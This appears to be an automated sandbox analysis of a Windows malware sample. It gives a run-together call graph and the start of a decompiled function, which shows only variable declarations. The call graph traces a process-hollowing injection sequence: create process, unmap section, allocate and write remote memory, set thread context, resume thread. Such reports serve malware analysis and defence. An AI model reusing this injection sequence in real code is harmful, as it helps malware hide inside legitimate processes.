calls 20903->20904 20905 2187e4c 20904->20905 21389 2186388 20905->21389 20911 2187e75 20912 21883c2 20911->20912 20913 2174c24 11 API calls 20911->20913 20914 21748c4 11 API calls 20912->20914 20917 2187eb9 20913->20917 20915 21883df 20914->20915 21588 2175398 20915->21588 20921 2174bb0 11 
API calls 20917->20921 20919 21748c4 11 API calls 20920 2188400 20919->20920 20920->20678 20922 2187eea 20921->20922 20923 2183690 18 API calls 20922->20923 20924 2187f0e 20923->20924 20925 2174c24 11 API calls 20924->20925 20926 2187f4f 20925->20926 20927 2174bb0 11 API calls 20926->20927 20928 2187f80 20927->20928 20929 2183690 18 API calls 20928->20929 20930 2187fa4 20929->20930 20931 2174c24 11 API calls 20930->20931 20932 2187fca 20931->20932 20933 2174bb0 11 API calls 20932->20933 20934 2187ffb 20933->20934 20935 2183690 18 API calls 20934->20935 20936 218801f 20935->20936 20937 2174c24 11 API calls 20936->20937 20938 218803b 20937->20938 20939 2174bb0 11 API calls 20938->20939 20940 218806c 20939->20940 20941 2183690 18 API calls 20940->20941 20942 2188090 20941->20942 20943 2174c24 11 API calls 20942->20943 20944 21880ac 20943->20944 20945 2174bb0 11 API calls 20944->20945 20946 21880dd 20945->20946 20947 2183690 18 API calls 20946->20947 20948 2188101 20947->20948 20949 217cac8 2 API calls 20948->20949 20950 2188121 GetProcAddress FreeLibrary WriteProcessMemory 20949->20950 20951 2174c24 11 API calls 20950->20951 20952 218817d 20951->20952 20953 2174bb0 11 API calls 20952->20953 20954 21881ae 20953->20954 20955 2183690 18 API calls 20954->20955 20956 21881d2 20955->20956 20957 2174c24 11 API calls 20956->20957 20958 21881ee 20957->20958 20959 2174bb0 11 API calls 20958->20959 20960 218821f 20959->20960 20961 2183690 18 API calls 20960->20961 20962 2188243 20961->20962 20963 2174c24 11 API calls 20962->20963 20964 218825f 20963->20964 20965 2174bb0 11 API calls 20964->20965 20966 2188290 20965->20966 20967 2183690 18 API calls 20966->20967 20968 21882b4 20967->20968 20969 2174c24 11 API calls 20968->20969 20970 21882d0 20969->20970 20971 2174bb0 11 API calls 20970->20971 20972 2188301 20971->20972 20973 2183690 18 API calls 20972->20973 20974 2188325 20973->20974 20975 2174c24 11 API calls 20974->20975 20976 2188341 20975->20976 20977 2174bb0 11 API calls 
20976->20977 20978 2188372 20977->20978 20979 2183690 18 API calls 20978->20979 20980 2188396 20979->20980 21581 2185b0c 20980->21581 20984 2174d64 20983->20984 20985 2178102 GetFileAttributesA 20984->20985 20986 217810d 20985->20986 20986->20450 20988 2174d64 20987->20988 20989 2178126 GetFileAttributesA 20988->20989 20990 2178131 20989->20990 20990->20441 20990->20454 20992 2177c5c 20991->20992 20993 2174990 11 API calls 20992->20993 20994 2177c64 20993->20994 20994->20491 20996 21748a0 11 API calls 20995->20996 20997 2172fd8 20996->20997 20998 2172fdc GetModuleFileNameA 20997->20998 20999 2172ffa GetCommandLineA 20997->20999 21000 2174990 11 API calls 20998->21000 21001 2173001 20999->21001 21003 2172ff8 21000->21003 21004 2173018 21001->21004 21780 2172ec8 21001->21780 21003->21004 21004->20525 21006 2183998 21005->21006 21007 21839c6 InetIsOffline 21006->21007 21008 21839d0 21007->21008 21009 21839e1 21007->21009 21010 21748f4 11 API calls 21008->21010 21011 21748f4 11 API calls 21009->21011 21012 21839df 21010->21012 21011->21012 21013 2174c24 11 API calls 21012->21013 21014 2183a0d 21013->21014 21015 2174bb0 11 API calls 21014->21015 21016 2183a36 21015->21016 21017 2183690 18 API calls 21016->21017 21020 2183a51 21017->21020 21018 21748c4 11 API calls 21019 218442a 21018->21019 21019->20499 21021 2174c24 11 API calls 21020->21021 21131 2184407 21020->21131 21022 2183ae1 21021->21022 21023 2174bb0 11 API calls 21022->21023 21024 2183b0a 21023->21024 21025 2183690 18 API calls 21024->21025 21026 2183b25 21025->21026 21027 2174c24 11 API calls 21026->21027 21028 2183b42 21027->21028 21029 2174bb0 11 API calls 21028->21029 21030 2183b6b 21029->21030 21031 2183690 18 API calls 21030->21031 21032 2183b86 21031->21032 21033 2183ba6 CreateProcessA 21032->21033 21034 2183bb4 GetThreadContext 21033->21034 21033->21131 21035 2183bd6 21034->21035 21034->21131 21036 2174c24 11 API calls 21035->21036 21037 2183bf3 21036->21037 21038 2174bb0 11 API calls 21037->21038 
21039 2183c1c 21038->21039 21040 2183690 18 API calls 21039->21040 21041 2183c37 21040->21041 21042 2174c24 11 API calls 21041->21042 21043 2183c54 21042->21043 21044 2174bb0 11 API calls 21043->21044 21045 2183c7d 21044->21045 21046 2183690 18 API calls 21045->21046 21047 2183c98 ReadProcessMemory 21046->21047 21048 2183ccc 21047->21048 21049 2183df5 VirtualAllocEx 21047->21049 21051 2174c24 11 API calls 21048->21051 21050 2183e1e 21049->21050 21050->21131 21796 21838a0 21050->21796 21054 2183ce9 21051->21054 21053 2183e32 21056 2174c24 11 API calls 21053->21056 21114 2184043 21053->21114 21057 2174bb0 11 API calls 21054->21057 21055 2174c24 11 API calls 21059 218408c 21055->21059 21058 2183e65 21056->21058 21060 2183d12 21057->21060 21061 2174bb0 11 API calls 21058->21061 21062 2174bb0 11 API calls 21059->21062 21063 2183690 18 API calls 21060->21063 21067 2183e91 21061->21067 21066 21840c1 21062->21066 21064 2183d2d 21063->21064 21065 2174c24 11 API calls 21064->21065 21072 2183d4a 21065->21072 21068 2183690 18 API calls 21066->21068 21069 2183690 18 API calls 21067->21069 21070 21840e5 21068->21070 21071 2183eaf 21069->21071 21073 2174c24 11 API calls 21070->21073 21074 2174c24 11 API calls 21071->21074 21075 2174bb0 11 API calls 21072->21075 21076 2184105 21073->21076 21077 2183ecf 21074->21077 21078 2183d73 21075->21078 21080 2174bb0 11 API calls 21076->21080 21079 2174bb0 11 API calls 21077->21079 21081 2183690 18 API calls 21078->21081 21086 2183f04 21079->21086 21085 218413a 21080->21085 21082 2183d8e NtUnmapViewOfSection 21081->21082 21083 2183dd1 VirtualAllocEx 21082->21083 21084 2183da6 VirtualAllocEx 21082->21084 21083->21050 21084->21050 21087 2183690 18 API calls 21085->21087 21088 2183690 18 API calls 21086->21088 21089 218415e 21087->21089 21090 2183f28 21088->21090 21091 217cac8 2 API calls 21089->21091 21092 2174c24 11 API calls 21090->21092 21093 218417e GetProcAddress FreeLibrary 21091->21093 21096 2183f71 21092->21096 21094 21841c4 
NtProtectVirtualMemory 21093->21094 21095 2174c24 11 API calls 21094->21095 21098 2184219 21095->21098 21097 2174bb0 11 API calls 21096->21097 21100 2183fa6 21097->21100 21099 2174bb0 11 API calls 21098->21099 21103 218424e 21099->21103 21101 2183690 18 API calls 21100->21101 21102 2183fca 21101->21102 21104 2174c24 11 API calls 21102->21104 21105 2183690 18 API calls 21103->21105 21108 2183fea 21104->21108 21106 2184272 21105->21106 21107 2174c24 11 API calls 21106->21107 21110 2184292 21107->21110 21109 2174bb0 11 API calls 21108->21109 21111 218401f 21109->21111 21112 2174bb0 11 API calls 21110->21112 21113 2183690 18 API calls 21111->21113 21115 21842c7 21112->21115 21113->21114 21114->21055 21116 2183690 18 API calls 21115->21116 21117 21842eb SetThreadContext 21116->21117 21118 2174c24 11 API calls 21117->21118 21119 218431b 21118->21119 21120 2174bb0 11 API calls 21119->21120 21121 2184350 21120->21121 21122 2183690 18 API calls 21121->21122 21123 2184374 21122->21123 21124 2174c24 11 API calls 21123->21124 21125 2184394 21124->21125 21126 2174bb0 11 API calls 21125->21126 21127 21843c9 21126->21127 21128 2183690 18 API calls 21127->21128 21129 21843ed NtResumeThread 21128->21129 21130 2172c5c 11 API calls 21129->21130 21130->21131 21131->21018 21133 21848a8 21132->21133 21134 21848dc InetIsOffline 21133->21134 21135 21848f5 21134->21135 21136 21848e6 21134->21136 21137 21848f3 21135->21137 21138 2174938 11 API calls 21135->21138 21799 2174938 21136->21799 21140 2174c24 11 API calls 21137->21140 21138->21137 21141 218491c 21140->21141 21142 2174bb0 11 API calls 21141->21142 21143 2184942 21142->21143 21144 2183690 18 API calls 21143->21144 21145 218495d VirtualAlloc 21144->21145 21146 2174c24 11 API calls 21145->21146 21147 21849aa 21146->21147 21148 2174bb0 11 API calls 21147->21148 21149 21849d0 21148->21149 21150 2183690 18 API calls 21149->21150 21151 21849eb 21150->21151 21152 2174c24 11 API calls 21151->21152 21153 2184a05 21152->21153 21154 2174bb0 11 

Control-flow Graph

• Executed
• Not Executed
                                                                                                C-Code - Quality: 53%
                                                                                                			E02189128(void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                                                				char _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				char _v16;
                                                                                                				char _v20;
                                                                                                				char _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				char _v32;
                                                                                                				char _v36;
                                                                                                				char _v40;
                                                                                                				intOrPtr _v44;
                                                                                                				char _v48;
                                                                                                				char _v52;
                                                                                                				char _v56;
                                                                                                				intOrPtr _v60;
                                                                                                				char _v64;
                                                                                                				char _v68;
                                                                                                				char _v72;
                                                                                                				intOrPtr _v76;
                                                                                                				char _v80;
                                                                                                				char _v84;
                                                                                                				char _v88;
                                                                                                				intOrPtr _v92;
                                                                                                				char _v96;
                                                                                                				char _v100;
                                                                                                				char _v104;
                                                                                                				intOrPtr _v108;
                                                                                                				char _v112;
                                                                                                				char _v116;
                                                                                                				char _v120;
                                                                                                				char _v124;
                                                                                                				intOrPtr _v128;
                                                                                                				char _v132;
                                                                                                				char _v136;
                                                                                                				char _v140;
                                                                                                				intOrPtr _v144;
                                                                                                				char _v148;
                                                                                                				char _v152;
                                                                                                				char _v156;
                                                                                                				intOrPtr _v160;
                                                                                                				char _v164;
                                                                                                				char _v168;
                                                                                                				char _v172;
                                                                                                				intOrPtr _v176;
                                                                                                				char _v180;
                                                                                                				char _v184;
                                                                                                				char _v188;
                                                                                                				intOrPtr* _v192;
                                                                                                				char _v196;
                                                                                                				intOrPtr _v200;
                                                                                                				char _v204;
                                                                                                				char _v208;
                                                                                                				char _v212;
                                                                                                				char _v216;
                                                                                                				intOrPtr _v220;
                                                                                                				char _v224;
                                                                                                				char _v228;
                                                                                                				char _v232;
                                                                                                				intOrPtr _v236;
                                                                                                				char _v240;
                                                                                                				char _v244;
                                                                                                				char _v248;
                                                                                                				intOrPtr _v252;
                                                                                                				char _v256;
                                                                                                				char _v260;
                                                                                                				char _v264;
                                                                                                				intOrPtr _v268;
                                                                                                				char _v272;
                                                                                                				char _v276;
                                                                                                				char _v280;
                                                                                                				intOrPtr _v284;
                                                                                                				char _v288;
                                                                                                				char _v292;
                                                                                                				char _v296;
                                                                                                				intOrPtr _v300;
                                                                                                				char _v304;
                                                                                                				char _v308;
                                                                                                				char _v312;
                                                                                                				char _v316;
                                                                                                				char _v320;
                                                                                                				intOrPtr _v324;
                                                                                                				char _v328;
                                                                                                				char _v332;
                                                                                                				char _v336;
                                                                                                				intOrPtr _v340;
                                                                                                				char _v344;
                                                                                                				char _v348;
                                                                                                				char _v352;
                                                                                                				char _v356;
                                                                                                				intOrPtr _v360;
                                                                                                				char _v364;
                                                                                                				char _v368;
                                                                                                				char _v372;
                                                                                                				intOrPtr _v376;
                                                                                                				char _v380;
                                                                                                				char _v384;
                                                                                                				char _v388;
                                                                                                				char _v392;
                                                                                                				char _v396;
                                                                                                				char _v400;
                                                                                                				char _v404;
                                                                                                				char _v408;
                                                                                                				char _v412;
                                                                                                				char _v416;
                                                                                                				char _v420;
                                                                                                				char _v424;
                                                                                                				intOrPtr _v428;
                                                                                                				char _v432;
                                                                                                				char _v436;
                                                                                                				char _v440;
                                                                                                				intOrPtr _v444;
                                                                                                				char _v448;
                                                                                                				char _v452;
                                                                                                				char _v456;
                                                                                                				intOrPtr _v460;
                                                                                                				char _v464;
                                                                                                				char _v468;
                                                                                                				char _v472;
                                                                                                				intOrPtr _v476;
                                                                                                				char _v480;
                                                                                                				char _v484;
                                                                                                				char _v488;
                                                                                                				intOrPtr _v492;
                                                                                                				char _v496;
                                                                                                				char _v500;
                                                                                                				char _v504;
                                                                                                				intOrPtr _v508;
                                                                                                				char _v512;
                                                                                                				char _v516;
                                                                                                				char _v520;
                                                                                                				intOrPtr _v524;
                                                                                                				char _v528;
                                                                                                				char _v532;
                                                                                                				char _v536;
                                                                                                				intOrPtr _v540;
                                                                                                				char _v544;
                                                                                                				char _v548;
                                                                                                				char _v552;
                                                                                                				intOrPtr _v556;
                                                                                                				char _v560;
                                                                                                				char _v564;
                                                                                                				char _v568;
                                                                                                				char _v572;
                                                                                                				intOrPtr _v576;
                                                                                                				char _v580;
                                                                                                				char _v584;
                                                                                                				char _v588;
                                                                                                				char _v592;
                                                                                                				intOrPtr _v596;
                                                                                                				char _v600;
                                                                                                				char _v604;
                                                                                                				char _v608;
                                                                                                				char _v612;
                                                                                                				char _v616;
                                                                                                				intOrPtr _v620;
                                                                                                				char _v624;
                                                                                                				char _v628;
                                                                                                				char _v632;
                                                                                                				intOrPtr _v636;
                                                                                                				char _v640;
                                                                                                				char _v644;
                                                                                                				char _v648;
                                                                                                				intOrPtr _v652;
                                                                                                				char _v656;
                                                                                                				char _v660;
                                                                                                				char _v664;
                                                                                                				intOrPtr _v668;
                                                                                                				char _v672;
                                                                                                				char _v676;
                                                                                                				char _v680;
                                                                                                				intOrPtr _v684;
                                                                                                				char _v688;
                                                                                                				char _v692;
                                                                                                				char _v696;
                                                                                                				char _v700;
                                                                                                				char _v704;
                                                                                                				intOrPtr _v708;
                                                                                                				char _v712;
                                                                                                				char _v716;
                                                                                                				char _v720;
                                                                                                				intOrPtr _v724;
                                                                                                				char _v728;
                                                                                                				char _v732;
                                                                                                				char _v736;
                                                                                                				intOrPtr _v740;
                                                                                                				char _v744;
                                                                                                				char _v748;
                                                                                                				char _v752;
                                                                                                				intOrPtr _v756;
                                                                                                				char _v760;
                                                                                                				char _v764;
                                                                                                				char _v768;
                                                                                                				intOrPtr _v772;
                                                                                                				char _v776;
                                                                                                				char _v780;
                                                                                                				intOrPtr _v784;
                                                                                                				char _v788;
                                                                                                				char _v792;
                                                                                                				char _v796;
                                                                                                				intOrPtr _v800;
                                                                                                				char _v804;
                                                                                                				char _v808;
                                                                                                				char _v812;
                                                                                                				intOrPtr _v816;
                                                                                                				char _v820;
                                                                                                				char _v824;
                                                                                                				char _v828;
                                                                                                				intOrPtr _v832;
                                                                                                				char _v836;
                                                                                                				char _v840;
                                                                                                				intOrPtr _v844;
                                                                                                				char _v848;
                                                                                                				intOrPtr _v852;
                                                                                                				char _v856;
                                                                                                				char _v860;
                                                                                                				char _v864;
                                                                                                				intOrPtr _v868;
                                                                                                				char _v872;
                                                                                                				char _v876;
                                                                                                				char _v880;
                                                                                                				intOrPtr _v884;
                                                                                                				char _v888;
                                                                                                				char _v892;
                                                                                                				char _v896;
                                                                                                				intOrPtr _v900;
                                                                                                				char _v904;
                                                                                                				char _v908;
                                                                                                				char _v912;
                                                                                                				intOrPtr _v916;
                                                                                                				char _v920;
                                                                                                				char _v924;
                                                                                                				char _v928;
                                                                                                				intOrPtr _v932;
                                                                                                				char _v936;
                                                                                                				char _v940;
                                                                                                				char _v944;
                                                                                                				intOrPtr _v948;
                                                                                                				char _v952;
                                                                                                				char _v956;
                                                                                                				char _v960;
                                                                                                				char _v964;
                                                                                                				intOrPtr _v968;
                                                                                                				char _v972;
                                                                                                				char _v976;
                                                                                                				char _v980;
                                                                                                				intOrPtr _v984;
                                                                                                				char _v988;
                                                                                                				char _v992;
                                                                                                				char _v996;
                                                                                                				intOrPtr _v1000;
                                                                                                				char _v1004;
                                                                                                				char _v1008;
                                                                                                				char _v1012;
                                                                                                				intOrPtr _v1016;
                                                                                                				char _v1020;
                                                                                                				char _v1024;
                                                                                                				intOrPtr _v1028;
                                                                                                				char _v1032;
                                                                                                				intOrPtr _v1036;
                                                                                                				char _v1040;
                                                                                                				char _v1044;
                                                                                                				char _v1048;
                                                                                                				intOrPtr _v1052;
                                                                                                				char _v1056;
                                                                                                				char _v1060;
                                                                                                				char _v1064;
                                                                                                				char _v1068;
                                                                                                				char _v1072;
                                                                                                				char _v1076;
                                                                                                				intOrPtr _v1080;
                                                                                                				char _v1084;
                                                                                                				char _v1088;
                                                                                                				char _v1092;
                                                                                                				intOrPtr _v1096;
                                                                                                				char _v1100;
                                                                                                				char _v1104;
                                                                                                				char _v1108;
                                                                                                				char _v1112;
                                                                                                				intOrPtr _v1116;
                                                                                                				char _v1120;
                                                                                                				char _v1124;
                                                                                                				char _v1128;
                                                                                                				intOrPtr _v1132;
                                                                                                				char _v1136;
                                                                                                				char _v1140;
                                                                                                				char _v1144;
                                                                                                				intOrPtr _v1148;
                                                                                                				char _v1152;
                                                                                                				char _v1156;
                                                                                                				char _v1160;
                                                                                                				intOrPtr _v1164;
                                                                                                				char _v1168;
                                                                                                				char _v1172;
                                                                                                				void* _v1176;
                                                                                                				char _v1180;
                                                                                                				char _v1184;
                                                                                                				char _v1188;
                                                                                                				char _v1192;
                                                                                                				char _v1196;
                                                                                                				intOrPtr _v1200;
                                                                                                				char _v1204;
                                                                                                				char _v1240;
                                                                                                				intOrPtr _v1244;
                                                                                                				char _v1248;
                                                                                                				char _v1252;
                                                                                                				char _v1256;
                                                                                                				intOrPtr _v1260;
                                                                                                				char _v1264;
                                                                                                				char _v1268;
                                                                                                				char _v1272;
                                                                                                				intOrPtr _v1276;
                                                                                                				char _v1280;
                                                                                                				char _v1284;
                                                                                                				char _v1288;
                                                                                                				intOrPtr _v1292;
                                                                                                				char _v1296;
                                                                                                				char _v1300;
                                                                                                				char _v1304;
                                                                                                				char _v1308;
                                                                                                				intOrPtr _v1312;
                                                                                                				char _v1316;
                                                                                                				char _v1320;
                                                                                                				char _v1324;
                                                                                                				intOrPtr _v1328;
                                                                                                				char _v1332;
                                                                                                				char _v1336;
                                                                                                				char _v1340;
                                                                                                				char _v1344;
                                                                                                				intOrPtr _v1348;
                                                                                                				char _v1352;
                                                                                                				char _v1356;
                                                                                                				char _v1360;
                                                                                                				intOrPtr _v1364;
                                                                                                				char _v1368;
                                                                                                				char _v1372;
                                                                                                				char _v1376;
                                                                                                				char _v1380;
                                                                                                				char _v1384;
                                                                                                				intOrPtr _v1388;
                                                                                                				char _v1392;
                                                                                                				char _v1396;
                                                                                                				char _v1400;
                                                                                                				intOrPtr _v1404;
                                                                                                				char _v1408;
                                                                                                				char _v1412;
                                                                                                				char _v1416;
                                                                                                				intOrPtr _v1420;
                                                                                                				char _v1424;
                                                                                                				char _v1428;
                                                                                                				char _v1432;
                                                                                                				intOrPtr _v1436;
                                                                                                				char _v1440;
                                                                                                				char _v1444;
                                                                                                				intOrPtr _v1448;
                                                                                                				char _v1452;
                                                                                                				char _v1456;
                                                                                                				char _v1460;
                                                                                                				intOrPtr _v1464;
                                                                                                				char _v1468;
                                                                                                				char _v1472;
                                                                                                				char _v1476;
                                                                                                				char _v1480;
                                                                                                				intOrPtr _v1484;
                                                                                                				char _v1832;
                                                                                                				char _v2092;
                                                                                                				char _v2104;
                                                                                                				char _v2132;
                                                                                                				intOrPtr _v2136;
                                                                                                				char _v2140;
                                                                                                				char _v2144;
                                                                                                				char _v2148;
                                                                                                				intOrPtr _v2152;
                                                                                                				char _v2156;
                                                                                                				char _v2160;
                                                                                                				char _v2164;
                                                                                                				intOrPtr _v2168;
                                                                                                				char _v2172;
                                                                                                				char _v2176;
                                                                                                				char _v2180;
                                                                                                				intOrPtr _v2184;
                                                                                                				char _v2188;
                                                                                                				char _v2192;
                                                                                                				char _v2196;
                                                                                                				char _v2200;
                                                                                                				intOrPtr _v2204;
                                                                                                				char _v2208;
                                                                                                				char _v2212;
                                                                                                				char _v2216;
                                                                                                				intOrPtr _v2220;
                                                                                                				char _v2224;
                                                                                                				char _v2228;
                                                                                                				char _v2232;
                                                                                                				char _v2236;
                                                                                                				intOrPtr _v2240;
                                                                                                				char _v2244;
                                                                                                				char _v2248;
                                                                                                				char _v2252;
                                                                                                				intOrPtr _v2256;
                                                                                                				char _v2260;
                                                                                                				char _v2264;
                                                                                                				char _v2268;
                                                                                                				intOrPtr _v2272;
                                                                                                				char _v2276;
                                                                                                				char _v2280;
                                                                                                				char _v2284;
                                                                                                				intOrPtr _v2288;
                                                                                                				char _v2292;
                                                                                                				char _v2296;
                                                                                                				char _v2300;
                                                                                                				intOrPtr _v2304;
                                                                                                				char _v2308;
                                                                                                				char _v2312;
                                                                                                				char _v2316;
                                                                                                				intOrPtr _v2320;
                                                                                                				char _v2324;
                                                                                                				char _v2328;
                                                                                                				char _v2332;
                                                                                                				intOrPtr _v2336;
                                                                                                				char _v2340;
                                                                                                				char _v2344;
                                                                                                				char _v2348;
                                                                                                				intOrPtr _v2352;
                                                                                                				char _v2356;
                                                                                                				char _v2360;
                                                                                                				char _v2364;
                                                                                                				intOrPtr _v2368;
                                                                                                				char _v2372;
                                                                                                				char _v2376;
                                                                                                				char _v2380;
                                                                                                				intOrPtr _v2384;
                                                                                                				char _v2388;
                                                                                                				char _v2392;
                                                                                                				char _v2396;
                                                                                                				intOrPtr _v2400;
                                                                                                				char _v2404;
                                                                                                				char _v2408;
                                                                                                				char _v2412;
                                                                                                				intOrPtr _v2416;
                                                                                                				char _v2420;
                                                                                                				char _v2424;
                                                                                                				char _v2428;
                                                                                                				intOrPtr _v2432;
                                                                                                				char _v2436;
                                                                                                				char _v2440;
                                                                                                				char _v2444;
                                                                                                				intOrPtr _v2448;
                                                                                                				char _v2452;
                                                                                                				char _v2456;
                                                                                                				char _v2460;
                                                                                                				char _v2464;
                                                                                                				intOrPtr _v2468;
                                                                                                				char _v2472;
                                                                                                				char _v2476;
                                                                                                				char _v2480;
                                                                                                				intOrPtr _v2484;
                                                                                                				char _v2488;
                                                                                                				char _v2492;
                                                                                                				char _v2496;
                                                                                                				char _v2500;
                                                                                                				char _v2504;
                                                                                                				char _v2508;
                                                                                                				char _v2512;
                                                                                                				intOrPtr _v2516;
                                                                                                				char _v2520;
                                                                                                				char _v2524;
                                                                                                				char _v2528;
                                                                                                				intOrPtr _v2532;
                                                                                                				char _v2536;
                                                                                                				char _v2540;
                                                                                                				char _v2544;
                                                                                                				intOrPtr _v2548;
                                                                                                				char _v2552;
                                                                                                				char _v2556;
                                                                                                				char _v2560;
                                                                                                				char _v2564;
                                                                                                				char _v2568;
                                                                                                				char _v2572;
                                                                                                				char _v2576;
                                                                                                				intOrPtr _v2580;
                                                                                                				char _v2584;
                                                                                                				char _v2588;
                                                                                                				char _v2592;
                                                                                                				char _v2596;
                                                                                                				char _v2600;
                                                                                                				char _v2604;
                                                                                                				char _v2608;
                                                                                                				intOrPtr _v2612;
                                                                                                				char _v2616;
                                                                                                				char _v2620;
                                                                                                				char _v2624;
                                                                                                				intOrPtr _v2628;
                                                                                                				char _v2632;
                                                                                                				char _v2636;
                                                                                                				char _v2640;
                                                                                                				intOrPtr _v2644;
                                                                                                				char _v2648;
                                                                                                				char _v2652;
                                                                                                				char _v2656;
                                                                                                				intOrPtr _v2660;
                                                                                                				char _v2664;
                                                                                                				char _v2668;
                                                                                                				char _v2672;
                                                                                                				char _v2676;
                                                                                                				char _v2680;
                                                                                                				intOrPtr _v2684;
                                                                                                				char _v2688;
                                                                                                				char _v2692;
                                                                                                				char _v2696;
                                                                                                				char _v2700;
                                                                                                				char _v2704;
                                                                                                				char _v2708;
                                                                                                				char _v2712;
                                                                                                				char _v2716;
                                                                                                				char _v2720;
                                                                                                				intOrPtr _v2724;
                                                                                                				char _v2728;
                                                                                                				char _v2732;
                                                                                                				char _v2736;
                                                                                                				char _v2740;
                                                                                                				char _v2744;
                                                                                                				char _v2748;
                                                                                                				char _v2752;
                                                                                                				char _v2756;
                                                                                                				char _v2760;
                                                                                                				char _v2764;
                                                                                                				char _v2768;
                                                                                                				char _v2772;
                                                                                                				char _v2776;
                                                                                                				char _v2780;
                                                                                                				char _v2784;
                                                                                                				char _v2788;
                                                                                                				char _v2792;
                                                                                                				char _v2796;
                                                                                                				char _v2800;
                                                                                                				char _v2804;
                                                                                                				char _v2808;
                                                                                                				char _v2812;
                                                                                                				char _v2816;
                                                                                                				char _v2820;
                                                                                                				char _v2824;
                                                                                                				char _v2828;
                                                                                                				char _v2832;
                                                                                                				intOrPtr _v2836;
                                                                                                				char _v2840;
                                                                                                				char _v2844;
                                                                                                				char _v2848;
                                                                                                				char _v2852;
                                                                                                				char _v2856;
                                                                                                				char _v2860;
                                                                                                				char _v2864;
                                                                                                				char _v2868;
                                                                                                				char _v2872;
                                                                                                				char _v2876;
                                                                                                				char _v2880;
                                                                                                				char _v2884;
                                                                                                				char _v2888;
                                                                                                				char _v2892;
                                                                                                				char _v2896;
                                                                                                				char _v2900;
                                                                                                				void* _t1159;
                                                                                                				intOrPtr* _t1161;
                                                                                                				intOrPtr _t1320;
                                                                                                				intOrPtr _t1321;
                                                                                                				intOrPtr _t1337;
                                                                                                				void* _t1342;
                                                                                                				char* _t1390;
                                                                                                				intOrPtr* _t1399;
                                                                                                				void* _t1403;
                                                                                                				intOrPtr _t1408;
                                                                                                				void* _t1443;
                                                                                                				intOrPtr _t1444;
                                                                                                				intOrPtr _t1476;
                                                                                                				intOrPtr _t1578;
                                                                                                				signed char _t1579;
                                                                                                				intOrPtr _t1632;
                                                                                                				void* _t1633;
                                                                                                				intOrPtr _t1634;
                                                                                                				intOrPtr _t1652;
                                                                                                				intOrPtr _t1672;
                                                                                                				intOrPtr _t1770;
                                                                                                				intOrPtr _t1776;
                                                                                                				intOrPtr _t1777;
                                                                                                				intOrPtr _t1835;
                                                                                                				intOrPtr _t1893;
                                                                                                				intOrPtr _t1925;
                                                                                                				void* _t1926;
                                                                                                				intOrPtr _t1927;
                                                                                                				intOrPtr _t1959;
                                                                                                				intOrPtr _t2007;
                                                                                                				intOrPtr _t2037;
                                                                                                				intOrPtr _t2067;
                                                                                                				intOrPtr _t2097;
                                                                                                				void* _t2240;
                                                                                                				intOrPtr _t2302;
                                                                                                				intOrPtr _t2311;
                                                                                                				intOrPtr _t2320;
                                                                                                				intOrPtr _t2329;
                                                                                                				intOrPtr _t2338;
                                                                                                				intOrPtr _t2347;
                                                                                                				intOrPtr _t2356;
                                                                                                				intOrPtr _t2365;
                                                                                                				intOrPtr _t2374;
                                                                                                				intOrPtr _t2383;
                                                                                                				intOrPtr _t2392;
                                                                                                				intOrPtr _t2401;
                                                                                                				intOrPtr _t2424;
                                                                                                				intOrPtr _t2433;
                                                                                                				intOrPtr _t2442;
                                                                                                				intOrPtr _t2451;
                                                                                                				intOrPtr _t2460;
                                                                                                				intOrPtr _t2469;
                                                                                                				intOrPtr _t2478;
                                                                                                				intOrPtr _t2486;
                                                                                                				intOrPtr _t2488;
                                                                                                				intOrPtr* _t2491;
                                                                                                				intOrPtr _t2511;
                                                                                                				intOrPtr _t2513;
                                                                                                				intOrPtr* _t2516;
                                                                                                				void* _t2535;
                                                                                                				void* _t2536;
                                                                                                				intOrPtr _t2540;
                                                                                                				intOrPtr _t2542;
                                                                                                				intOrPtr _t2605;
                                                                                                				long _t2639;
                                                                                                				void* _t2669;
                                                                                                				intOrPtr* _t2714;
                                                                                                				void* _t2745;
                                                                                                				void* _t2761;
                                                                                                				intOrPtr* _t2784;
                                                                                                				intOrPtr* _t2788;
                                                                                                				intOrPtr* _t2824;
                                                                                                				intOrPtr* _t2831;
                                                                                                				intOrPtr _t2834;
                                                                                                				intOrPtr _t2836;
                                                                                                				intOrPtr _t2962;
                                                                                                				intOrPtr _t3054;
                                                                                                				CHAR* _t3055;
                                                                                                				intOrPtr _t3097;
                                                                                                				intOrPtr* _t3160;
                                                                                                				intOrPtr* _t3163;
                                                                                                				intOrPtr* _t3171;
                                                                                                				intOrPtr* _t3179;
                                                                                                				intOrPtr _t3181;
                                                                                                				intOrPtr* _t3188;
                                                                                                				intOrPtr _t3191;
                                                                                                				intOrPtr _t3235;
                                                                                                				intOrPtr _t3239;
                                                                                                				intOrPtr _t3241;
                                                                                                				intOrPtr _t3247;
                                                                                                				char* _t3337;
                                                                                                				intOrPtr _t3346;
                                                                                                				intOrPtr _t3376;
                                                                                                				intOrPtr* _t3377;
                                                                                                				intOrPtr _t3378;
                                                                                                				intOrPtr* _t3380;
                                                                                                				intOrPtr* _t3381;
                                                                                                				void* _t3383;
                                                                                                				intOrPtr _t3384;
                                                                                                				intOrPtr _t3385;
                                                                                                				intOrPtr _t3386;
                                                                                                				intOrPtr _t3387;
                                                                                                				intOrPtr _t3388;
                                                                                                				intOrPtr _t3389;
                                                                                                				intOrPtr _t3390;
                                                                                                				intOrPtr _t3391;
                                                                                                				intOrPtr _t3392;
                                                                                                				intOrPtr _t3393;
                                                                                                				intOrPtr _t3394;
                                                                                                				intOrPtr _t3397;
                                                                                                				intOrPtr _t3398;
                                                                                                				intOrPtr _t3399;
                                                                                                				intOrPtr _t3400;
                                                                                                				intOrPtr _t3403;
                                                                                                				intOrPtr _t3404;
                                                                                                				intOrPtr _t3405;
                                                                                                				intOrPtr _t3407;
                                                                                                				intOrPtr _t3408;
                                                                                                				intOrPtr _t3409;
                                                                                                				intOrPtr _t3410;
                                                                                                				intOrPtr _t3411;
                                                                                                				intOrPtr _t3412;
                                                                                                				intOrPtr _t3413;
                                                                                                				intOrPtr _t3414;
                                                                                                				intOrPtr _t3415;
                                                                                                				intOrPtr _t3418;
                                                                                                				intOrPtr _t3420;
                                                                                                				intOrPtr _t3421;
                                                                                                				intOrPtr _t3423;
                                                                                                				intOrPtr _t3424;
                                                                                                				intOrPtr _t3425;
                                                                                                				intOrPtr _t3426;
                                                                                                				intOrPtr _t3427;
                                                                                                				intOrPtr _t3428;
                                                                                                				intOrPtr _t3431;
                                                                                                				intOrPtr _t3432;
                                                                                                				intOrPtr _t3433;
